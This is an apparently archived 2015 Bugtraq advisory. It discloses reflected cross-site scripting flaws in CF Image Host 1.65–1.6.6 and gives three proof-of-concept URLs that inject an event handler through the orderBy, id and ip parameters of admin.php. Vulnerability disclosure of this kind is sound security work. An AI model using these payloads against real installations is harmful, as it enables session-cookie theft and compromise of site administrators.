
Date: Sat, 14 Nov 2015 05:25:59 GMT
From: apparitionsec@...il.com
To: bugtraq@...urityfocus.com
Subject: CF Image Host XSS

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-XSS.txt



Vendor:
====================================
codefuture.co.uk/projects/imagehost



Product:
===================================
CF Image Host 1.65 - 1.6.6

Archive download listed as: version 1.65
unzips as imagehost 1.6.6



Vulnerability Type:
==========================
Cross site scripting - XSS



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

Multiple reflected XSS entry points exist allowing arbitrary client side
browser code execution on victims who click our infected linx. Undermining
the trust between the client and server, possibly leading to information theft,
drop malware, steal session cookies etc...



XSS Exploit code(s):
===================

1)
http://localhost/imagehost1.6.6/admin.php?act=images&orderBy=%22%20onMouseMove=%22alert%280%29

2) 
http://localhost/imagehost1.6.6/admin.php?act=edit&id=%22%20onMouseMove=%22alert%280%29


3) 
http://localhost/imagehost1.6.6/admin.php?act=images&ip=%22%20onMouseMove=%22alert%280%29




Disclosure Timeline:
=====================
Vendor Notification:  NA
November 14, 2015  : Public Disclosure




Exploitation Technique:
=======================
Remote



Severity Level:
================
Medium




Description:
=====================================================


Request Method(s):              [+] GET


Vulnerable Product:             [+] CF Image Host 1.65 - 1.6.6


Vulnerable Parameter(s):        [+] orderBy, id, ip



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by hyp3rlinx
